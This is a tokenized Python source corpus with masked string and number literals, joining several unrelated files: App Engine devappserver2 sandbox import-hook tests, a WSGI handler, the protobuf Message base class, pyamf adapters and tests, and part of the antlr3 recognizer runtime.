: <EOL> if path != '<STR_LIT>' : <EOL> raise ImportError <EOL> def find_module ( self , unused_fullname ) : <EOL> return None <EOL> def load_module ( self , fullname ) : <EOL> raise ImportError <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> sys . path_hooks = [ DummyPathHook ] <EOL> util = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , util . __name__ ) <EOL> def test_load_without_path_hook ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> urllib = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , urllib . __dict__ ) <EOL> self . assertEqual ( '<STR_LIT>' , urllib . __name__ ) <EOL> def test_load_without_path_hook_not_found ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> self . assertRaises ( ImportError , self . hook . load_module , '<STR_LIT>' ) <EOL> def test_load_already_in_sys_modules ( self ) : <EOL> module = imp . new_module ( '<STR_LIT:foo>' ) <EOL> sys . modules [ '<STR_LIT:foo>' ] = module <EOL> self . assertEqual ( module , self . hook . load_module ( '<STR_LIT:foo>' ) ) <EOL> def test_is_package ( self ) : <EOL> self . assertTrue ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_standard_lib ( self ) : <EOL> self . assertTrue ( self . hook . is_package ( '<STR_LIT:email>' ) ) <EOL> def test_is_package_not_package_standard_lib ( self ) : <EOL> self . assertFalse ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_not_package ( self ) : <EOL> self . assertFalse ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . is_package , '<STR_LIT>' ) <EOL> def test_get_source ( self ) : <EOL> with open ( __import__ ( '<STR_LIT>' ) . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) as f : <EOL> source = f . read ( ) <EOL> self . assertEqual ( source , self . hook . get_source ( '<STR_LIT>' ) ) <EOL> def test_get_source_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . get_source , '<STR_LIT>' ) <EOL> def test_get_source_standard_library ( self ) : <EOL> self . assertTrue ( self . hook . get_source ( '<STR_LIT>' ) ) <EOL> def test_get_code ( self ) : <EOL> filename = __import__ ( '<STR_LIT>' ) . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( filename ) as f : <EOL> expected_code = compile ( f . read ( ) , filename , '<STR_LIT>' ) <EOL> self . assertEqual ( expected_code , self . hook . get_code ( '<STR_LIT>' ) ) <EOL> def test_get_code_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . get_code , '<STR_LIT>' ) <EOL> def test_get_code_standard_library ( self ) : <EOL> self . assertTrue ( self . hook . get_code ( '<STR_LIT>' ) ) <EOL> def test_os_module_policy ( self ) : <EOL> hooked_os = imp . new_module ( '<STR_LIT>' ) <EOL> hooked_os . __dict__ . update ( os . __dict__ ) <EOL> sandbox . _MODULE_OVERRIDE_POLICIES [ '<STR_LIT>' ] . apply_policy ( hooked_os . __dict__ ) <EOL> self . assertEqual ( stubs . return_minus_one , hooked_os . getpid ) <EOL> self . assertNotIn ( '<STR_LIT>' , hooked_os . __dict__ ) <EOL> self . assertEqual ( stubs . os_error_not_implemented , hooked_os . unlink ) <EOL> self . assertEqual ( os . walk , hooked_os . walk ) <EOL> class CModuleImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module_enabled_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> lxml = __import__ ( '<STR_LIT>' ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' , lxml . __path__ ) ) <EOL> def test_find_module_disabled_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> lxml = __import__ ( '<STR_LIT>' ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' , lxml . __path__ ) ) <EOL> def test_find_module_not_c_module ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_load_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ ] ) <EOL> self . assertRaises ( ImportError , hook . load_module , '<STR_LIT>' ) <EOL> class BuiltinImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module_whitelisted ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> for name in sandbox . _WHITE_LIST_C_MODULES : <EOL> self . assertIsNone ( hook . find_module ( name ) ) <EOL> def test_find_module_not_whitelisted ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_find_module_not_builtin ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_load_module ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertRaises ( ImportError , hook . load_module , '<STR_LIT>' ) <EOL> class PathOverrideImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . saved_lxml = lxml <EOL> self . saved_pil = PIL <EOL> self . saved_urllib = urllib <EOL> def tearDown ( self ) : <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_urllib <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_pil <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_lxml <EOL> def test_package_success ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_lxml = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_lxml . __file__ , lxml . __file__ ) <EOL> self . assertEqual ( hooked_lxml . __path__ , lxml . __path__ ) <EOL> self . assertEqual ( hooked_lxml . __loader__ , hook ) <EOL> self . assertEqual ( [ os . path . dirname ( self . saved_lxml . __file__ ) ] , <EOL> hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_package_success_pil_in_sys_path ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_pil = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_pil . __file__ , PIL . __file__ ) <EOL> self . assertEqual ( hooked_pil . __path__ , PIL . __path__ ) <EOL> self . assertEqual ( hooked_pil . __loader__ , hook ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertEqual ( [ os . path . dirname ( self . saved_pil . __file__ ) ] , <EOL> hook . extra_sys_paths ) <EOL> def test_module_success ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_urllib = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_urllib . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> urllib . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertEqual ( hooked_urllib . __loader__ , hook ) <EOL> self . assertNotIn ( '<STR_LIT>' , hooked_urllib . __dict__ ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_disabled_modules ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_module_not_installed ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT:foo>' ] ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT:foo>' ) ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_import_alread_in_sys_modules ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( os , hook . load_module ( '<STR_LIT>' ) ) <EOL> class PathRestrictingImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mox = mox . Mox ( ) <EOL> self . mox . StubOutWithMock ( imp , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( stubs . FakeFile , '<STR_LIT>' ) <EOL> self . hook = sandbox . PathRestrictingImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_module_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . C_EXTENSION ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_module_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . C_EXTENSION ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_compiled_python_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_COMPILED ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_compiled_python_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_COMPILED ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_builtin ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT:bar>' , <EOL> ( None , None , imp . C_BUILTIN ) ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_py_frozen ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT:bar>' , <EOL> ( None , None , imp . PY_FROZEN ) ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_enabled_c_library ( self ) : <EOL> imp . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , None ) ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , None ) ) <EOL> def test_load_module ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . load_module , '<STR_LIT>' ) <EOL> class PyCryptoRandomImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module ( self ) : <EOL> self . assertIsInstance ( <EOL> sandbox . PyCryptoRandomImportHook . find_module ( <EOL> '<STR_LIT>' ) , <EOL> sandbox . PyCryptoRandomImportHook ) <EOL> self . assertIsNone ( <EOL> sandbox . PyCryptoRandomImportHook . find_module ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from google . appengine . tools . devappserver2 import url_handler <EOL> class WSGIHandler ( url_handler . URLHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wsgi_app , url_pattern ) : <EOL> """<STR_LIT>""" <EOL> super ( WSGIHandler , self ) . __init__ ( re . compile ( url_pattern ) ) <EOL> self . _wsgi_app = wsgi_app <EOL> def handle ( self , unused_match , environ , start_response ) : <EOL> """<STR_LIT>""" <EOL> return self . _wsgi_app ( environ , start_response ) </s>
<s> """<STR_LIT>""" <EOL> class Error ( Exception ) : pass <EOL> class DecodeError ( Error ) : pass <EOL> class EncodeError ( Error ) : pass <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> DESCRIPTOR = None <EOL> def __deepcopy__ ( self , memo = None ) : <EOL> clone = type ( self ) ( ) <EOL> clone . MergeFrom ( self ) <EOL> return clone <EOL> def __eq__ ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __ne__ ( self , other_msg ) : <EOL> return not self == other_msg <EOL> def __hash__ ( self ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def MergeFrom ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def CopyFrom ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> if self is other_msg : <EOL> return <EOL> self . Clear ( ) <EOL> self . MergeFrom ( other_msg ) <EOL> def Clear ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def SetInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def IsInitialized ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def MergeFromString ( self , serialized ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ParseFromString ( self , serialized ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> self . MergeFromString ( serialized ) <EOL> def SerializeToString ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def SerializePartialToString ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ListFields ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def HasField ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ClearField ( self , field_name ) : <EOL> raise NotImplementedError <EOL> def HasExtension ( self , extension_handle ) : <EOL> raise NotImplementedError <EOL> def ClearExtension ( self , extension_handle ) : <EOL> raise NotImplementedError <EOL> def ByteSize ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _SetListener ( self , message_listener ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( serialized = self . SerializePartialToString ( ) ) <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __init__ ( ) <EOL> self . ParseFromString ( state [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import decimal <EOL> import pyamf <EOL> def convert_Decimal ( x , encoder ) : <EOL> """<STR_LIT>""" <EOL> if encoder . strict is False : <EOL> return float ( x ) <EOL> raise pyamf . EncodeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if hasattr ( decimal , '<STR_LIT>' ) : <EOL> pyamf . add_type ( decimal . Decimal , convert_Decimal ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os . path <EOL> try : <EOL> sys . path . remove ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> except ValueError : <EOL> pass <EOL> google = __import__ ( '<STR_LIT>' ) <EOL> webapp = google . appengine . ext . webapp <EOL> from pyamf import remoting , DecodeError <EOL> from pyamf . remoting import gateway <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class WebAppGateway ( webapp . RequestHandler , gateway . BaseGateway ) : <EOL> """<STR_LIT>""" <EOL> __name__ = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> gateway . BaseGateway . __init__ ( self , * args , ** kwargs ) <EOL> def getResponse ( self , request ) : <EOL> """<STR_LIT>""" <EOL> response = remoting . Envelope ( request . amfVersion ) <EOL> for name , message in request : <EOL> self . request . amf_request = message <EOL> processor = self . getProcessor ( message ) <EOL> response [ name ] = processor ( message , http_request = self . request ) <EOL> return response <EOL> def get ( self ) : <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . out . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . request . method ) <EOL> def post ( self ) : <EOL> body = self . request . body_file . read ( ) <EOL> stream = None <EOL> timezone_offset = self . _get_timezone_offset ( ) <EOL> try : <EOL> request = remoting . decode ( body , strict = self . strict , <EOL> logger = self . logger , timezone_offset = timezone_offset ) <EOL> except ( DecodeError , IOError ) : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % request ) <EOL> try : <EOL> response = self . getResponse ( request ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % response ) <EOL> try : <EOL> stream = remoting . encode ( response , strict = self . strict , <EOL> logger = self . logger , timezone_offset = timezone_offset ) <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> response = stream . getvalue ( ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = remoting . CONTENT_TYPE <EOL> self . response . headers [ '<STR_LIT>' ] = str ( len ( response ) ) <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from pyamf . adapters import util <EOL> import __builtin__ <EOL> if not hasattr ( __builtin__ , '<STR_LIT>' ) : <EOL> from sets import Set as set <EOL> class Iterable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iterable ) : <EOL> self . iterable = iterable <EOL> def __iter__ ( self ) : <EOL> return iter ( self . iterable ) <EOL> def keys ( self ) : <EOL> return self . iterable . keys ( ) <EOL> def values ( self ) : <EOL> return self . iterable . values ( ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . iterable . __getitem__ ( name ) <EOL> class HelperTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . encoder = object ( ) <EOL> def test_to_list ( self ) : <EOL> self . assertEqual ( util . to_list ( Iterable ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , self . encoder ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertEqual ( util . to_list ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , self . encoder ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( util . to_list ( '<STR_LIT:a>' , self . encoder ) , [ '<STR_LIT:a>' ] ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_list , obj , self . encoder ) <EOL> def test_to_set ( self ) : <EOL> self . assertEqual ( util . to_set ( Iterable ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , self . encoder ) , set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> self . assertEqual ( util . to_set ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , self . encoder ) , set ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) ) <EOL> self . assertEqual ( util . to_set ( '<STR_LIT:a>' , self . encoder ) , set ( '<STR_LIT:a>' ) ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_set , obj , self . encoder ) <EOL> def test_to_dict ( self ) : <EOL> self . assertEqual ( util . to_dict ( Iterable ( { '<STR_LIT:a>' : '<STR_LIT:b>' } ) , self . encoder ) , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_dict , obj , self . encoder ) <EOL> def test_to_tuple ( self ) : <EOL> self . assertEqual ( util . to_tuple ( Iterable ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) , self . encoder ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_tuple , obj , self . encoder ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import inspect <EOL> from antlr3 import runtime_version , runtime_version_str <EOL> from antlr3 . constants import DEFAULT_CHANNEL , HIDDEN_CHANNEL , EOF , EOR_TOKEN_TYPE , INVALID_TOKEN_TYPE <EOL> from antlr3 . exceptions import RecognitionException , MismatchedTokenException , MismatchedRangeException , MismatchedTreeNodeException , NoViableAltException , EarlyExitException , MismatchedSetException , MismatchedNotSetException , FailedPredicateException , BacktrackingFailed , UnwantedTokenException , MissingTokenException <EOL> from antlr3 . tokens import CommonToken , EOF_TOKEN , SKIP_TOKEN <EOL> from antlr3 . compat import set , frozenset , reversed <EOL> class RecognizerSharedState ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . following = [ ] <EOL> self . errorRecovery = False <EOL> self . lastErrorIndex = - <NUM_LIT:1> <EOL> self . backtracking = <NUM_LIT:0> <EOL> self . ruleMemo = None <EOL> self . syntaxErrors = <NUM_LIT:0> <EOL> self . token = None <EOL> self . tokenStartCharIndex = - <NUM_LIT:1> <EOL> self . tokenStartLine = None <EOL> self . tokenStartCharPositionInLine = None <EOL> self . channel = None <EOL> self . type = None <EOL> self . text = None <EOL> class BaseRecognizer ( object ) : <EOL> """<STR_LIT>""" <EOL> MEMO_RULE_FAILED = - <NUM_LIT:2> <EOL> MEMO_RULE_UNKNOWN = - <NUM_LIT:1> <EOL> DEFAULT_TOKEN_CHANNEL = DEFAULT_CHANNEL <EOL> HIDDEN = HIDDEN_CHANNEL <EOL> tokenNames = None <EOL> antlr_version = ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> antlr_version_str = "<STR_LIT>" <EOL> def __init__ ( self , state = None ) : <EOL> self . input = None <EOL> if state is None : <EOL> state = RecognizerSharedState ( ) <EOL> self . _state = state <EOL> if self . antlr_version > runtime_version : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . antlr_version_str , <EOL> runtime_version_str , <EOL> self . antlr_version_str ) ) <EOL> elif ( self . antlr_version < ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) and <EOL> self . antlr_version != runtime_version ) : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . antlr_version_str , <EOL> runtime_version_str , <EOL> self . antlr_version_str ) ) <EOL> def setInput ( self , input ) : <EOL> self . input = input <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state is None : <EOL> return <EOL> self . _state . following = [ ] <EOL> self . _state . errorRecovery = False <EOL> self . _state . lastErrorIndex = - <NUM_LIT:1> <EOL> self . _state . syntaxErrors = <NUM_LIT:0> <EOL> self . _state . backtracking = <NUM_LIT:0> <EOL> if self . _state . ruleMemo is not None : <EOL> self . _state . ruleMemo = { } <EOL> def match ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> matchedSymbol = self . getCurrentInputSymbol ( input ) <EOL> if self . input . LA ( <NUM_LIT:1> ) == ttype : <EOL> self . input . consume ( ) <EOL> self . _state . errorRecovery = False <EOL> return matchedSymbol <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> matchedSymbol = self . recoverFromMismatchedToken ( input , ttype , follow ) <EOL> return matchedSymbol <EOL> def matchAny ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . _state . errorRecovery = False <EOL> self . input . consume ( ) <EOL> def mismatchIsUnwantedToken ( self , input , ttype ) : <EOL> return input . LA ( <NUM_LIT:2> ) == ttype <EOL> def mismatchIsMissingToken ( self , input , follow ) : <EOL> if follow is None : <EOL> return False <EOL> if EOR_TOKEN_TYPE in follow : <EOL> if len ( self . _state . following ) > <NUM_LIT:0> : <EOL> follow = follow - set ( [ EOR_TOKEN_TYPE ] ) <EOL> viableTokensFollowingThisRule = self . computeContextSensitiveRuleFOLLOW ( ) <EOL> follow = follow | viableTokensFollowingThisRule <EOL> if input . LA ( <NUM_LIT:1> ) in follow or EOR_TOKEN_TYPE in follow : <EOL> return True <EOL> return False <EOL> def mismatch ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> if self . mismatchIsUnwantedToken ( input , ttype ) : <EOL> raise UnwantedTokenException ( ttype , input ) <EOL> elif self . mismatchIsMissingToken ( input , follow ) : <EOL> raise MissingTokenException ( ttype , input , None 